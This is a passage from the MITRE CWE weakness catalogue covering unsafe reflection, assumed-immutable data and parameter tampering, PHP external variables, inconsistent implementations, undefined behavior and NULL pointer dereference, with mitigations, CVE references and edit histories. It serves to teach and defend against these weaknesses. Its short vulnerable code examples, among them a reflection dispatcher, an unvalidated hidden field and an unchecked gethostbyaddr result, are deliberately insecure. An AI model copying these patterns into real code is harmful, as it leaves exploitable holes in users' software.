classpath (CWE-427) or add new entries to the product's classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the product. + + + + + + + + + + + + + + Reflection Injection + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Confidentiality + Availability + Other + Execute Unauthorized Code or Commands + Alter Execution Logic + The attacker might be able to execute code that is not directly accessible to the attacker. Alternately, the attacker could call unexpected code in the wrong place or the wrong time, possibly modifying critical system state. + + + Availability + Other + DoS: Crash, Exit, or Restart + Other + The attacker might be able to use reflection to call the wrong code, possibly with unexpected arguments that violate the API (CWE-227). This could cause the product to exit or hang. + + + Confidentiality + Read Application Data + By causing the wrong code to be invoked, the attacker might be able to trigger a runtime error that leaks sensitive information in the error message, such as CWE-536. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Refactor your code to avoid using reflection. + + + Architecture and Design + Do not use user-controlled inputs to select and load classes or code. + + + Implementation + Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code. + + + + + A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection: + + String ctl = request.getParameter("ctl");Worker ao = null;if (ctl.equals("Add")) {ao = new AddCommand();}else if (ctl.equals("Modify")) {ao = new ModifyCommand();}else {throw new UnknownActionError();}ao.doAction(request); + + A programmer might refactor this code to use reflection as follows: + + String ctl = request.getParameter("ctl");Class cmdClass = Class.forName(ctl + "Command");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request); + + The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher's access control code. If they do not modify the access control code, then some Worker classes will not have any access control. + One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows: + + String ctl = request.getParameter("ctl");Class cmdClass = Class.forName(ctl + "Command");Worker ao = (Worker) cmdClass.newInstance();ao.checkAccessControl(request);ao.doAction(request); + + Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker's favor, the damage will already have been done. Although this scenario is relatively benign in simple products, in larger products where complexity grows exponentially it is not unreasonable that an attacker could find a constructor to leverage as part of an attack. + + + + + CVE-2004-2331 + Database system allows attackers to bypass sandbox restrictions by using the Reflection APi. + https://www.cve.org/CVERecord?id=CVE-2004-2331 + + + + + Unsafe Reflection + + + SEC06-J + Do not use reflection to increase accessibility of classes, methods, or fields + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Alternate_Terms, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Demonstrative_Examples, Description, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe Reflection + Use of Externally-Controlled Input to Select Classes or Code (aka 'Unsafe Reflection') + + + + The product does not properly protect an assumed-immutable element from being modified by an attacker. + This occurs when a particular input is critical enough to the functioning of the application that it should not be modifiable at all, but it is. Certain resources are often assumed to be immutable when they are not, such as hidden form fields in web applications, cookies, and reverse DNS lookups. + + + + + + + + + Implementation + + + Architecture and Design + + + + + Integrity + Modify Application Data + Common data types that are attacked are environment variables, web application parameters, and HTTP headers. + + + Integrity + Unexpected State + + + + + Architecture and Design + Operation + Implementation + When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence. + + + + + In the code excerpt below, an array returned by a Java method is modified despite the fact that arrays are mutable. + + String[] colors = car.getAllPossibleColors();colors[0] = "Red"; + + + + + + CVE-2002-1757 + Relies on $PHP_SELF variable for authentication. + https://www.cve.org/CVERecord?id=CVE-2002-1757 + + + CVE-2005-1905 + Gain privileges by modifying assumed-immutable code addresses that are accessed by a driver. + https://www.cve.org/CVERecord?id=CVE-2005-1905 + + + + + Modification of Assumed-Immutable Data + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + MAID issues can be primary to many other weaknesses, and they are a major factor in languages that provide easy access to internal program constructs, such as PHP's register_globals and similar features. However, MAID issues can also be resultant from weaknesses that modify internal state; for example, a program might validate some data and store it in memory, but a buffer overflow could overwrite that validated data, leading to a change in program logic. + There are many examples where the MUTABILITY property is a major factor in a vulnerability. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationship_Notes, Theoretical_Notes, Time_of_Introduction + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields. + + If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input. + For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application. + + + + + + + + + + + Assumed-Immutable Parameter Tampering + + + + + Implementation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Integrity + Modify Application Data + Without appropriate protection mechanisms, the client can easily tamper with cookies and similar web data. Reliance on the cookies without detailed validation can lead to problems such as SQL injection. If you use cookie values for security related decisions on the server side, manipulating the cookies might lead to violations of security policies such as authentication bypassing, user impersonation and privilege escalation. In addition, storing sensitive data in the cookie without appropriate protection can also lead to disclosure of sensitive user data, especially data stored in persistent cookies. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable. + + String accountID = request.getParameter("accountID");User user = getUserFromID(Long.parseLong(accountID)); + + + + Hidden fields should not be trusted as secure parameters. + An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring: + + <input type="hidden" + + or even just "hidden". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks. + + + + + CVE-2002-0108 + Forum product allows spoofed messages of other users via hidden form fields for name and e-mail address. + https://www.cve.org/CVERecord?id=CVE-2002-0108 + + + CVE-2000-0253 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0253 + + + CVE-2000-0254 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0254 + + + CVE-2000-0926 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0926 + + + CVE-2000-0101 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0101 + + + CVE-2000-0102 + Shopping cart allows price modification via hidden form field. + https://www.cve.org/CVERecord?id=CVE-2000-0102 + + + CVE-2000-0758 + Allows admin access by modifying value of form field. + https://www.cve.org/CVERecord?id=CVE-2000-0758 + + + CVE-2002-1880 + Read messages by modifying message ID parameter. + https://www.cve.org/CVERecord?id=CVE-2002-1880 + + + CVE-2000-1234 + Send email to arbitrary users by modifying email parameter. + https://www.cve.org/CVERecord?id=CVE-2000-1234 + + + CVE-2005-1652 + Authentication bypass by setting a parameter. + https://www.cve.org/CVERecord?id=CVE-2005-1652 + + + CVE-2005-1784 + Product does not check authorization for configuration change admin script, leading to password theft via modified e-mail address field. + https://www.cve.org/CVERecord?id=CVE-2005-1784 + + + CVE-2005-2314 + Logic error leads to password disclosure. + https://www.cve.org/CVERecord?id=CVE-2005-2314 + + + CVE-2005-1682 + Modification of message number parameter allows attackers to read other people's messages. + https://www.cve.org/CVERecord?id=CVE-2005-1682 + + + + + Web Parameter Tampering + + + A4 + Insecure Direct Object Reference + CWE More Specific + + + A1 + Unvalidated Input + CWE More Specific + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion. + This is a technology-specific MAID problem. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Relationship_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Web Parameter Tampering + + + + A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Integrity + Modify Application Data + + + + + Requirements + Implementation + Carefully identify which variables can be controlled or influenced by an external user, and consider adopting a naming convention to emphasize when externally modifiable variables are being used. An application should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Do not allow your application to run with register_globals enabled. If you implement a register_globals emulator, be extremely careful of variable extraction, dynamic evaluation, and similar issues, since weaknesses in your emulation could allow external variable modification to take place even without register_globals. + + + + + CVE-2000-0860 + File upload allows arbitrary file read by setting hidden form variables to match internal variable names. + https://www.cve.org/CVERecord?id=CVE-2000-0860 + + + CVE-2001-0854 + Mistakenly trusts $PHP_SELF variable to determine if include script was called by its parent. + https://www.cve.org/CVERecord?id=CVE-2001-0854 + + + CVE-2002-0764 + PHP remote file inclusion by modified assumed-immutable variable. + https://www.cve.org/CVERecord?id=CVE-2002-0764 + + + CVE-2001-1025 + Modify key variable when calling scripts that don't load a library that initializes it. + https://www.cve.org/CVERecord?id=CVE-2001-1025 + + + CVE-2003-0754 + Authentication bypass by modifying array used for authentication. + https://www.cve.org/CVERecord?id=CVE-2003-0754 + + + + + PHP External Variable Modification + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is a language-specific instance of Modification of Assumed-Immutable Data (MAID). This can be resultant from direct request (alternate path) issues. It can be primary to weaknesses such as PHP file inclusion, SQL injection, XSS, authentication bypass, and others. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses a function that has inconsistent implementations across operating systems and versions. + + The use of inconsistent implementations can cause changes in behavior when the code is ported or built under a different environment than the programmer expects, which can lead to security problems in some cases. + The implementation of many functions varies by platform, and at times, even by different versions of the same platform. Implementation differences can include: + + Slight differences in the way parameters are interpreted leading to inconsistent results. + Some implementations of the function carry significant security risks. + The function might not be defined on all platforms. + The function might change which return codes it can provide, or change the meaning of its return codes. + + + + + + + + Primary + + + Indirect + + + + + + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Requirements + Do not accept inconsistent behavior from the API specifications when the deviant behavior increase the risk level. + + + + + Inconsistent Implementations + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Inconsistent Implementations + + + + The behavior of this function is undefined unless its control parameter is set to a specific value. + + + + + + Indirect + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Undefined Behavior + + + SFP1 + Glitch in computation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The Linux Standard Base Specification 2.0.1 for libc places constraints on the arguments to some internal functions [21]. If the constraints are not met, the behavior of the functions is not defined. It is unusual for this function to be called directly. It is almost always invoked through a macro defined in a system header file, and the macro ensures that the following constraints are met: The value 1 must be passed to the third parameter (the version number) of the following file system function: __xmknod The value 2 must be passed to the third parameter (the group argument) of the following wide character string functions: __wcstod_internal __wcstof_internal __wcstol_internal __wcstold_internal __wcstoul_internal The value 3 must be passed as the first parameter (the version number) of the following file system functions: __xstat __lxstat __fxstat __xstat64 __lxstat64 __fxstat64 + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Undefined Behavior + + + + A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit. + NULL pointer dereference issues can occur through a number of flaws, including race conditions, and simple programming omissions. + + + + + + + + Resultant + NULL pointer dereferences are frequently resultant from rarely encountered error conditions, since these are most likely to escape detection during the testing phases. + + + + + + + + + + + + NPD + + + null deref + + + nil pointer dereference + used for access of nil in Go programs + + + + + Implementation + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + NULL pointer dereferences usually result in the failure of the process unless exception handling (on some platforms) is available and implemented. Even when exception handling is being used, it can still be very difficult to return the software to a safe state of operation. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Read Memory + Modify Memory + In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution. + + + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + + + Manual Dynamic Analysis + Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + If all pointers that could have been modified are sanity-checked previous to use, nearly all NULL pointer dereferences can be prevented. + + + Requirements + The choice could be made to use a language that is not susceptible to these issues. + + + Implementation + Check the results of all functions that return a value and verify that the value is non-null before acting upon it. + Moderate + Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. This solution does not handle the use of improperly initialized variables (CWE-665). + + + Architecture and Design + Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values. + + + Implementation + Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + + + While there are no complete fixes aside from conscientious programming, the following steps will go a long way to ensure that NULL pointer dereferences do not occur. + + if (pointer1 != NULL) { + + + /* make use of pointer1 */ + + + /* ... */ + + + } + + If you are working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the if statement; and unlock when it has finished. + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). + Note that this code is also vulnerable to a buffer overflow (CWE-119). + + + In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method. + + String cmd = System.getProperty("cmd");cmd = cmd.trim(); + + + + This Android application has registered to handle a URL when sent an intent: + + + + ... + IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + ... + + public class UrlHandlerReceiver extends BroadcastReceiver { + @Overridepublic void onReceive(Context context, Intent intent) { + if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); + + ... + } + } + } + + The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. + + + Consider the following example of a typical client server exchange. The HandleRequest function is intended to perform a request and use a defer to close the connection whenever the function returns. + + func HandleRequest(client http.Client, request *http.Request) (*http.Response, error) { + + response, err := client.Do(request) + defer response.Body.Close() + if err != nil { + + return nil, err + + }... + } + + If a user supplies a malformed request or violates the client policy, the Do method can return a nil response and a non-nil err. + This HandleRequest Function evaluates the close before checking the error. A deferred call's arguments are evaluated immediately, so the defer statement panics due to a nil response. + + + + + CVE-2005-3274 + race condition causes a table to be corrupted if a timer activates while it is being modified, leading to resultant NULL dereference; also involves locking. + https://www.cve.org/CVERecord?id=CVE-2005-3274 + + + CVE-2002-1912 + large number of packets leads to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2002-1912 + + + CVE-2005-0772 + packet with invalid error status value triggers NULL dereference + https://www.cve.org/CVERecord?id=CVE-2005-0772 + + + CVE-2009-4895 + Chain: race condition for an argument value, possibly resulting in NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-4895 + + + CVE-2020-29652 + ssh component for Go allows clients to cause a denial of service (nil pointer dereference) against SSH servers. + https://www.cve.org/CVERecord?id=CVE-2020-29652 + + + CVE-2009-2692 + Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476). + https://www.cve.org/CVERecord?id=CVE-2009-2692 + + + CVE-2009-3547 + Chain: race condition might allow resource to be released before operating on it, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3547 + + + CVE-2009-3620 + Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3620 + + + CVE-2009-2698 + Chain: IP and UDP layers each track the same value with different mechanisms that can get out of sync, possibly resulting in a NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-2698 + + + CVE-2009-2692 + Chain: uninitialized function pointers can be dereferenced allowing code execution + https://www.cve.org/CVERecord?id=CVE-2009-2692 + + + CVE-2009-0949 + Chain: improper initialization of memory can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-0949 + + + CVE-2008-3597 + Chain: game server can access player data structures before initialization has happened leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-3597 + + + CVE-2020-6078 + Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) + https://www.cve.org/CVERecord?id=CVE-2020-6078 + + + CVE-2008-0062 + Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), 